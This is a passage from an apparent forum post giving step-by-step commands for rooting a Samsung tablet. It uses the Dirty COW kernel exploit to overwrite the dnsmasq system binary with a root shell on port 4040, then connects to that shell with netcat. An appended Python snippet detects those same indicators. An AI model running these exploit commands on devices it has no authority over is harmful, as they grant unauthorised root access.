8. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
9. Run 'adb forward tcp:4040 tcp:4040'
10. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
11. Profit!
The precompiled process (easier, binaries attached to this post):
1. Download and unzip the attached package.
2. Open up a shell/command prompt, change into the directory you unzipped the files into, and run:
adb push dcow /data/local/tmp/dcow
adb push rshell /data/local/tmp/rshell
adb shell 'chmod 777 /data/local/tmp/*'
adb shell '/data/local/tmp/dcow /data/local/tmp/rshell /system/bin/dnsmasq'
3. On the tablet, go into Settings -> More networks -> Mobile Hotspot, and turn it on. You will need a SIM card to do this, any SIM will do - even if the device is still Verizon-locked. As we've written our reverse root shell spawning code into dnsmasq, and dnsmasq runs as root, our shell will run as root as well!
4. Verify it worked by running 'adb shell' and running 'netstat' - you should see a process listening on 0.0.0.0:4040. That's our shell! If you run 'ps' you should also see /system/bin/dnsmasq followed by /system/bin/shell, both running as root.
5. Run 'adb forward tcp:4040 tcp:4040'
6. Run netcat to connect to the shell: 'nc localhost 4040' (on Windows, you can get a precompiled netcat binary from http://nmap.org/dist/ncat-portable-5.59BETA1.zip )
7. Profit!
Keep in mind, this is only temporary; a reboot will clear it and you'll have to exploit again. It is also not an extensive root as my end goal is to unlock the bootloader and get rid of the (awful) stock firmware.
Credits to timwr and all involved in the dirtycow exploit, freddierice for trident, as well as everyone on XDA whose research and comments over the past 4 years pointed me in the right direction. This tablet is still quite decent in 2020/2021, it deserves to be "free"!
----
As I understand it, as per @beaups https://github.com/beaups/SamsungCID & SamDunk, we will need two things - I hope someone in the community will volunteer these!
1. A dev-edition CID
2. An aboot dump from a dev-edition P605V (I'm not sure the regular P605 will work)
@ryanbg has made much inroad here as well. All input/assistance is appreciated!
Should these turn out to be unobtainium in some time, I will look into a permanent root solution.
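The indicators named in the verification step of the post above (a listener on 0.0.0.0:4040 and a root shell next to /system/bin/dnsmasq), checked from the defender's side over `ps` and `netstat` output. This is an added example, not part of the original post; the sample output is constructed, and the shell's name and its being a child of the dnsmasq process are assumptions.

```python
# Constructed sample output (not captured from a real device).
SAMPLE_PS = """\
USER     PID   PPID  VSIZE  RSS   WCHAN    PC       NAME
root      1     0     2616   812   ffffffff 00000000 S /init
root      214   1     9120   1204  ffffffff 00000000 S /system/bin/netd
shell     3051  1     4532   220   ffffffff 00000000 S /sbin/adbd
shell     3102  3051  1320   520   c0123456 00000000 S /system/bin/sh
root      4410  214   1980   640   ffffffff 00000000 S /system/bin/dnsmasq
root      4417  4410  1320   512   ffffffff 00000000 S /system/bin/sh
"""
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q Local Address          Foreign Address        State
 tcp       0      0 127.0.0.1:5037         0.0.0.0:*              LISTEN
 tcp       0      0 0.0.0.0:4040           0.0.0.0:*              LISTEN
 tcp       0      0 192.168.43.1:53        0.0.0.0:*              LISTEN
 tcp6      0      0 :::5555                :::*                   LISTEN
"""
SHELLS = {"/system/bin/sh", "sh"}  # assumption: how ps names the shell

def parse_ps(text):
    """Parse `ps` rows (USER PID PPID ... NAME) into {pid: (user, ppid, name)}."""
    procs = {}
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 4 and f[1].isdigit() and f[2].isdigit():
            procs[int(f[1])] = (f[0], int(f[2]), f[-1])
    return procs

def root_shells_under(procs, parent_name="/system/bin/dnsmasq"):
    """PIDs of root-owned shells whose parent process is `parent_name`."""
    hits = []
    for pid, (user, ppid, name) in sorted(procs.items()):
        parent = procs.get(ppid)
        if user == "root" and name in SHELLS and parent and parent[2] == parent_name:
            hits.append(pid)
    return hits

def wildcard_listeners(text, allowed_ports=frozenset()):
    """TCP ports listening on 0.0.0.0 or :: that are not in the allow-list."""
    ports = set()
    for line in text.splitlines():
        f = line.split()
        if len(f) >= 6 and f[0].startswith("tcp") and f[-1] == "LISTEN":
            host, _, port = f[3].rpartition(":")
            if host in ("0.0.0.0", "::") and port.isdigit() and int(port) not in allowed_ports:
                ports.add(int(port))
    return sorted(ports)
```

A DNS helper that owns a root shell, or a wildcard listener outside the allow-list, is worth an alert on its own; together they match what the post tells the reader to look for.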
